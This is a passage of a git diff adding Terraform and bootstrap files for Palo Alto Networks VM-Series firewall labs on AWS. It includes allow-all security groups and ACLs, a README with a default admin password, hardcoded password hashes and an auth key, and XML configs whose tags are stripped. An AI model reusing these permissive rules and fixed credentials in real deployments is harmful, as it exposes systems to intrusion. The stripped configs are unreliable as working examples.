"${aws_network_interface.eni-untrust.id}" + } + + + + tags { + Name = "${var.name}" + } +} + +output "eip_untrust" { + value = "${aws_eip.eip-untrust.public_ip}" +} + +output "eip_mgmt" { + value = "${aws_eip.eip-management.public_ip}" +} + +output "instanceid" { + value = "${aws_instance.instance-ngfw.id}" +} diff --git a/aws/VPC_Mirror_Target/vpc_security.tf b/aws/VPC_Mirror_Target/vpc_security.tf new file mode 100644 index 00000000..089e4a42 --- /dev/null +++ b/aws/VPC_Mirror_Target/vpc_security.tf @@ -0,0 +1,176 @@ +data "aws_availability_zones" "available" {} + +resource "aws_vpc" "vpc_security" { + cidr_block = "${var.vpc_security_cidr}" + + tags { + Name = "vpc_security" + } +} + + +################# +# Mirror Subnets +################# +resource "aws_subnet" "vpc_mirror_pub_1" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_mirror_pub_1}" + availability_zone = "${data.aws_availability_zones.available.names[0]}" + + tags { + Name = "vpc_mirror_pub_1" + } +} + + +resource "aws_subnet" "vpc_mirror_pub_2" { + vpc_id = "${aws_vpc.vpc_security.id}" + cidr_block = "${var.vpc_mirror_pub_2}" + availability_zone = "${data.aws_availability_zones.available.names[1]}" + + tags { + Name = "vpc_mirror_pub_2" + } +} + + +################### + + + + +resource "aws_internet_gateway" "vpc_security_igw" { + vpc_id = "${aws_vpc.vpc_security.id}" + + tags { + Name = "vpc_securty_igw" + } +} + +resource "aws_route" "vpc_security_default" { + route_table_id = "${aws_vpc.vpc_security.default_route_table_id}" + destination_cidr_block = "0.0.0.0/0" + gateway_id = "${aws_internet_gateway.vpc_security_igw.id}" +} + +resource "aws_security_group" "allow_all" { + name = "allow_all" + description = "Allow all inbound traffic" + vpc_id = "${aws_vpc.vpc_security.id}" +} + +resource "aws_security_group_rule" "allow_all_ingress" { + type = "ingress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_all.id}" +} + +resource "aws_security_group_rule" "allow_all_egress" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_all.id}" +} + +resource "aws_security_group" "allow_https_ssh" { + name = "allow_https_ssh" + description = "Allow HTTPS and SSH inbound traffic" + vpc_id = "${aws_vpc.vpc_security.id}" +} + +resource "aws_security_group_rule" "allow_ssh_ingress" { + type = "ingress" + from_port = 22 + to_port = 22 + protocol = "tcp" + cidr_blocks = ["${var.management_cidr}"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +resource "aws_security_group_rule" "allow_https_ingress" { + type = "ingress" + from_port = 443 + to_port = 443 + protocol = "tcp" + cidr_blocks = ["${var.management_cidr}"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +resource "aws_security_group_rule" "allow_all" { + type = "egress" + from_port = 0 + to_port = 0 + protocol = "-1" + cidr_blocks = ["0.0.0.0/0"] + + security_group_id = "${aws_security_group.allow_https_ssh.id}" +} + +################### +# VPC Mirror FWs +################### +module "ngfw3" { + source = "./vm-series/" + + name = "ngfw3" + + aws_key = "${var.aws_key}" + + + + untrust_subnet_id = "${aws_subnet.vpc_mirror_pub_1.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_pub_1}" + + management_subnet_id = "${aws_subnet.vpc_mirror_pub_1.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + mgmtfwip = "${var.fw_ip_subnet_mgmt_1}" + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile3.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket3}" + + + + aws_region = "${var.aws_region}" +} +module "ngfw4" { + source = "./vm-series/" + + name = "ngfw4" + + aws_key = "${var.aws_key}" + + + + untrust_subnet_id = "${aws_subnet.vpc_mirror_pub_2.id}" + untrust_security_group_id = "${aws_security_group.allow_all.id}" + untrustfwip = "${var.fw_ip_subnet_pub_2}" + + management_subnet_id = "${aws_subnet.vpc_mirror_pub_2.id}" + management_security_group_id = "${aws_security_group.allow_https_ssh.id}" + mgmtfwip = "${var.fw_ip_subnet_mgmt_2}" + + bootstrap_profile = "${aws_iam_instance_profile.bootstrap_profile4.id}" + bootstrap_s3bucket = "${var.bootstrap_s3bucket4}" + + + + aws_region = "${var.aws_region}" +} +####################### + +output "FW-3-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw3.eip_mgmt}" +} +output "FW-4-MGMT" { + value = "Access the firewall MGMT via: https://${module.ngfw4.eip_mgmt}" +} diff --git a/aws/sdwan-lab/access-control-lists.tf b/aws/sdwan-lab/access-control-lists.tf new file mode 100644 index 00000000..2ffce3a5 --- /dev/null +++ b/aws/sdwan-lab/access-control-lists.tf @@ -0,0 +1,26 @@ +resource "aws_network_acl" "allow-all" { + vpc_id = "${aws_vpc.SDWAN.id}" + subnet_ids = ["${aws_subnet.SD-WAN-MGT.id}","${aws_subnet.SD-WAN-WAN1.id}","${aws_subnet.SD-WAN-WAN2.id}","${aws_subnet.SD-WAN-WAN3.id}","${aws_subnet.SD-WAN-WAN4.id}","${aws_subnet.SD-WAN-MPLS.id}","${aws_subnet.SD-WAN-Branch25.id}","${aws_subnet.SD-WAN-Branch50.id}","${aws_subnet.SD-WAN-Hub.id}",] + + egress { + protocol = "-1" + rule_no = 2 + action = "allow" + cidr_block = "0.0.0.0/0" + from_port = 0 + to_port = 0 + } + + ingress { + protocol = "-1" + rule_no = 1 + action = "allow" + cidr_block = "0.0.0.0/0" + from_port = 0 + to_port = 0 + } + + tags { + Name = "allow-all" + } +} \ No newline at end of file diff --git a/aws/sdwan-lab/aws_vars.tf b/aws/sdwan-lab/aws_vars.tf new file mode 100644 index 00000000..d2ad45d7 --- /dev/null +++ b/aws/sdwan-lab/aws_vars.tf @@ -0,0 +1,121 @@ +variable "aws_region" {} +#variable "aws_access_key" {} +#variable "aws_secret_key" {} +variable "VPC-Name" {} +variable "SD-WAN-HUB-FW" {} +variable "SD-WAN-HUB-SVR" {} +variable "SD-WAN-ROUTER-JITTER" {} +variable "SD-WAN-BRANCH25-FW" {} +variable "SD-WAN-BRANCH50-FW" {} +variable "SD-WAN-BRANCH25-IWS" {} +variable "SD-WAN-BRANCH50-IWS" {} +variable "VPCCIDR" {} +variable "SD-WAN-MGT" {} +variable "SD-WAN-WAN1" {} +variable "SD-WAN-WAN2" {} +variable "SD-WAN-WAN3" {} +variable "SD-WAN-WAN4" {} +variable "SD-WAN-MPLS" {} +variable "SD-WAN-Branch25" {} +variable "SD-WAN-Branch50" {} +variable "SD-WAN-Hub" {} +variable "ServerKeyName" {} + +#VMSeries 9.0.3-xfr BYOL +variable "PANFWRegionMap" { + type = "map" + + default = { + "ap-northeast-1" = "ami-04bd06018d53fd939" + + "ap-northeast-2" = "ami-0566141c898e243fc" + + "ap-south-1" = "ami-0ef9ba2fb8c8b2f23" + + "ap-southeast-1" = "ami-023496caf9aedcbb5" + + "ap-southeast-2" = "ami-08399a38c19098edb" + + "ca-central-1" = "ami-0f4812911392bee42" + + "eu-central-1" = "ami-04102d137edd8a952" + + "eu-north-1" = "ami-d59d17ab" + + "eu-west-1" = "ami-09312982f28611e13" + + "eu-west-2" = "ami-0063940db47af7581" + + "eu-west-3" = "ami-07a4c669069e02995" + + "sa-east-1" = "ami-077e676dce3d06231" + + "us-east-1" = "ami-0ec2529b60a7fff22" + + "us-east-2" = "ami-06efcb94b48d8263c" + + "us-west-1" = "ami-03801628148e17514" + + "us-west-2" = "ami-05a457c9f5f6a45e0" + } +} +variable "PanoramaRegionMap" { + type = "map" + #Panorama 9.0.5 + default = { + "ap-northeast-1" = "ami-08e8bded936bbd795" + + "ap-northeast-2" = "ami-0569a43a1ab4864e0" + + "ap-south-1" = "ami-01e194040c88ec7f7" + + "ap-southeast-1" = "ami-05946a342e4f38c79" + + "ap-southeast-2" = "ami-060009b850df3908c" + + "ca-central-1" = "ami-042b6efd5f827ea88" + + "eu-central-1" = "ami-0d4a11e11365c9bae" + + "eu-north-1" = "ami-0d274936829f13359" + + "eu-west-1" = "ami-06a1715befd746fe4" + + "eu-west-2" = "ami-03a4a370ee5442bac" + + "eu-west-3" = "ami-0637f615e0f748d62" + + "sa-east-1" = "ami-091669d04559b7056" + + "us-east-1" = "ami-0fd6fc67d9f2e7750" + + "us-east-2" = "ami-013c503f1741aa646" + + "us-west-1" = "ami-02e821dd4b602e9ec" + + "us-west-2" = "ami-0403335c2e31d2a81" + } +} +variable "UbuntuRegionMap" { + type = "map" + + #Ubuntu Server 18.04 LTS (HVM) + default = { + "ap-northeast-1" = "ami-014cc8d7cb6d26dc8" + "ap-northeast-2" = "ami-004b3430b806f3b1a" + "ap-south-1" = "ami-0f59afa4a22fad2f0" + "ap-southeast-1" = "ami-08b3278ea6e379084" + "ap-southeast-2" = "ami-00d7116c396e73b04" + "ca-central-1" = "ami-0086bcfbab4b22f60" + "eu-central-1" = "ami-0062c497b55437b01" + "eu-north-1" = "ami-0ca3b50bc99a41773" + "eu-west-1" = "ami-0987ee37af7792903" + "eu-west-2" = "ami-05945867d79b7d926" + "eu-west-3" = "ami-00c60f4df93ff408e" + "sa-east-1" = "ami-0fb487b6f6ab53ff" + "us-east-1" = "ami-09f9d773751b9d606" + "us-east-2" = "ami-0891395d749676c2e" + "us-west-1" = "ami-0c0e5a396959508b0" + "us-west-2" = "ami-0bbe9b07c5fe8e86e" + } +} diff --git a/aws/sdwan-lab/branch25-fw-bootstrap.tf b/aws/sdwan-lab/branch25-fw-bootstrap.tf new file mode 100644 index 00000000..678d93cc --- /dev/null +++ b/aws/sdwan-lab/branch25-fw-bootstrap.tf @@ -0,0 +1,56 @@ +# Create a BootStrap S3 Bucket + +resource "random_id" "branch25-fw-bucket_prefix" { + byte_length = 4 +} + +resource "aws_s3_bucket" "branch25-fw-bootstrap-bucket" { + #branch25-fw-bucket_prefix = "${var.branch25-fw-bucket_prefix}" + bucket = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}" + acl = "private" + force_destroy = true + + tags { + Name = "branch25-fw-bootstrap-bucket" + } +} + +#resource "aws_s3_bucket_object" "branch25-fw-bootstrap_xml" { +# depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"] +# bucket = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}" +# acl = "private" +# key = "config/bootstrap.xml" +# source = "branch25-fw-bootstrap/bootstrap.xml" +#} + +resource "aws_s3_bucket_object" "branch25-fw-init-cft_txt" { + bucket = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"] + acl = "private" + key = "config/init-cfg.txt" + source = "branch25-fw-bootstrap/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "branch25-fw-software" { + bucket = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"] + acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "branch25-fw-license" { + bucket = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"] + acl = "private" + key = "license/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "branch25-fw-content" { + bucket = "branch25-fw-${lower(random_id.branch25-fw-bucket_prefix.hex)}" + depends_on = ["aws_s3_bucket.branch25-fw-bootstrap-bucket"] + acl = "private" + key = "content/" + source = "/dev/null" +} diff --git a/aws/sdwan-lab/branch25-fw-bootstrap/init-cfg.txt b/aws/sdwan-lab/branch25-fw-bootstrap/init-cfg.txt new file mode 100644 index 00000000..ee4b3c1f --- /dev/null +++ b/aws/sdwan-lab/branch25-fw-bootstrap/init-cfg.txt @@ -0,0 +1,18 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=FW-1 +vm-auth-key=649475581476015 +panorama-server=52.35.104.230 +panorama-server-2= +tplname=tgw-vpc-az1-stack +dgname=tgw-vpc-az1 +dns-primary= +dns-secondary= +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=yes +dhcp-accept-server-domain=yes \ No newline at end of file diff --git a/aws/sdwan-lab/branch25-fw.tf b/aws/sdwan-lab/branch25-fw.tf new file mode 100644 index 00000000..0a274368 --- /dev/null +++ b/aws/sdwan-lab/branch25-fw.tf @@ -0,0 +1,138 @@ +resource "aws_iam_role" "branch25-fw-bootstraprole" { + name = "branch25-fw-bootstraprole-${random_id.sdwan.hex}" + + assume_role_policy = < + +

+ +#### VM-Series Overview +* Firewall-1 handles egress traffic to internet +* Firewall-2 handles east/west traffic between Spoke1-VPC and Spoke2-VPC +* Both Firewalls can handle inbound traffic to the spokes +* Firewalls are bootstrapped off an S3 Bucket (buckets are created during deployment) + +#### S3 Buckets Overview +* 2 x S3 Buckets are deployed & configured to bootstrap the firewalls with a fully working configuration. +* The buckets names have a random 30 string added to its name for global uniqueness `tgw-fw#-bootstrap-` + +## Prerequistes +1. This Terraform build assumes the AWS CLI is installed on the machine doing the deploymnet [(Install AWS CLI)](https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-install.html) . +2. If you do not want to use the AWS CLI, the `providers.tf` must be modified to include your AWS Access Key and Secret Key [(more info)](https://www.terraform.io/docs/providers/aws/index.html). + +## How to Deploy +1. Download the **tgw_2fw_vpc_insertion** directory. +2. In an editor, open `variables.tf` + * `Line 10`: Set your existing AWS EC2 Key + * `Line 14`: Enter a source address to access the VM-Series management interface (in valid CIDR notation). This address will be added to the management interface's Network Security Group. + * `Line 17`: Uncomment either 'byol', 'payg1', or 'payg2'. This sets the licensing for both VM-Series firewalls (bring-your-own-license, bundle1, or bundle2). +3. (Optional) If you are using BYOL and would like to license the VM-Series via bootstrapping, paste your authcode in `bootstrap_files/fw1/authcodes` and `bootstrap_files/fw2/authcodes`. (Note: The authcode must be registered prior to deployment). +4. After deployment, the firewalls' username and password are: + * **Username:** paloalto + * **Password:** PanPassword123! + +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/authcodes b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/authcodes new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/authcodes @@ -0,0 +1 @@ + diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/bootstrap.xml b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/bootstrap.xml new file mode 100644 index 00000000..c9e19aeb --- /dev/null +++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/bootstrap.xml @@ -0,0 +1,822 @@ + + + + + + $1$kinpefww$Y2Rzm/JZNfQxs6SB3oW5A. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + + + yes + + + $1$oxidaogq$toVFt6xD7ruJnTHYeVftq1 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + allow-lambda + + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + no + any + 2 + + + 192.168.10.1 + + + None + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 2 + + + 192.168.20.1 + + + None + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + no + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + America/New_York + + yes + yes + + vmseries-fw1 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + yes + yes + no + yes + + + vmseries-fw1 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + trust-zone + + + untrust-zone + + + any + + + any + + + any + + + any + + + ssh + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + allow + yes + + + + trust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + untrust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + deny + + + + + + + + + + ethernet1/1 + + + + + untrust-zone + + + trust-zone + + + any + + + any + + any + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.0.4 + + any + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.1.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.0.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw1 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.1.4 + + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 192.168.10.4 + +
+ + + color6 + + + color13 + + +
+
+
+
+
diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/init-cfg.txt b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/init-cfg.txt new file mode 100644 index 00000000..968814f6 --- /dev/null +++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw1/init-cfg.txt @@ -0,0 +1,18 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=vmseries-fw1 +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=no +dhcp-accept-server-domain=yes diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/authcodes b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/authcodes new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/authcodes @@ -0,0 +1 @@ + diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/bootstrap.xml b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/bootstrap.xml new file mode 100644 index 00000000..32e7d2e8 --- /dev/null +++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/bootstrap.xml @@ -0,0 +1,821 @@ + + + + + + $1$gyvolqhn$qTxyak3dNrZGte6mj5znJ. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + + + yes + + + $1$lfqxgvff$AYLGhPFeBO8CyXTeBaqEg. + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + allow-lambda + + + + + + + + + + + 3 + 5 + wait-recover + + + + + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.11.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + 192.168.21.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + no + yes + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + America/New_York + + yes + yes + + vmseries-fw2 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDSWphVDNFbnRlRU80cHFIM09aRnFIOFB6ekFnZmtnNG1yYnNpaWZyZzZDTDJqNjFmbWhIRTFVdjlZalBVRjhJMUhrei9lWGpuMno4Z2ltOEdVcFR1WDExUXhiSmNsM1NLYU51VGxWWVA0VnJvSmJDU3VBVStDdzcyT3haMTN3UVFXa0JzaDRnV05iZ3dnSU1TcURHckYvSlZMV2JxemZDeWFEVmltVVRqdFN4L0NSVDUwbEpqdGR4b2pVdm5mUHZnWXQrVVNBNVpqSExPMDJvY1hZcXBhSEp3UnN5OUo2NGtVcEluRXBKYlFqbXZhajJieVIzb1ZkYzVuVlNsREtvWVlzd1ZNUlZxUXQwNDFYdFhhSm9yZm9SYnF1dmd6Vk1sN2w5V0JWQ2RYOE8rbm9iSHlMT1lZdVBqU05IN1FKZVNPeDJkd1N2ZG9zRmJmZ3ZpUHRjT1QgbXJtLWVhc3R1cy1rZXk= + + + yes + yes + no + yes + + + vmseries-fw2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 2002 + + + + + + + + + + 1002 + + + + + + + + + + + + + + + trust-zone + + + untrust-zone + + + any + + + any + + + any + + + any + + + ssh + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + allow + yes + + + + trust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + untrust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + deny + + + + + + + + + + ethernet1/1 + + + + + untrust-zone + + + trust-zone + + + any + + + any + + any + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.0.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.1.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-2001 + + + + ethernet1/2 + + + + + 22 + 10.2.0.4 + + + + + untrust-zone + + + untrust-zone + + + any + + + untrust-fw2 + + tcp-2002 + + + + ethernet1/2 + + + + + 22 + 10.2.1.4 + + + + + + + + allow + no + yes + + + deny + no + yes + + + + + + + + ethernet1/1 + ethernet1/2 + + + +
+ + 192.168.11.4 + +
+ + + color6 + + + color13 + + +
+
+
+
+
diff --git a/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/init-cfg.txt b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/init-cfg.txt new file mode 100644 index 00000000..2fd77546 --- /dev/null +++ b/aws/tgw_2fw_vpc_insertion/bootstrap_files/fw2/init-cfg.txt @@ -0,0 +1,18 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +hostname=vmseries-fw2 +panorama-server= +panorama-server-2= +tplname= +dgname= +dns-primary= +dns-secondary= +op-command-modes=mgmt-interface-swap +dhcp-send-hostname=yes +dhcp-send-client-id=yes +dhcp-accept-server-hostname=no +dhcp-accept-server-domain=yes diff --git a/aws/tgw_2fw_vpc_insertion/create_s3_bootstrap.tf b/aws/tgw_2fw_vpc_insertion/create_s3_bootstrap.tf new file mode 100644 index 00000000..cb138478 --- /dev/null +++ b/aws/tgw_2fw_vpc_insertion/create_s3_bootstrap.tf @@ -0,0 +1,161 @@ +#************************************************************************************ +# CREATE 2 S3 BUCKETS FOR FW1 & FW2 +#************************************************************************************ +resource "random_string" "randomstring" { + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "aws_s3_bucket" "bootstrap_bucket_fw1" { + bucket = "${join("", list(var.bootstrap_s3bucket1_create, "-", random_string.randomstring.result))}" + acl = "private" + force_destroy = true +} + +resource "aws_s3_bucket" "bootstrap_bucket_fw2" { + bucket = "${join("", list(var.bootstrap_s3bucket2_create, "-", random_string.randomstring.result))}" + acl = "private" + force_destroy = true +} + + +#************************************************************************************ +# CREATE FW1 DIRECTORIES & UPLOAD FILES FROM /bootstrap_files/fw1 DIRECTORY +#************************************************************************************ +resource "aws_s3_bucket_object" "bootstrap_xml" { + bucket = "${aws_s3_bucket.bootstrap_bucket_fw1.id}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap_files/fw1/bootstrap.xml" +} + +resource "aws_s3_bucket_object" "init-cft_txt" { + bucket = 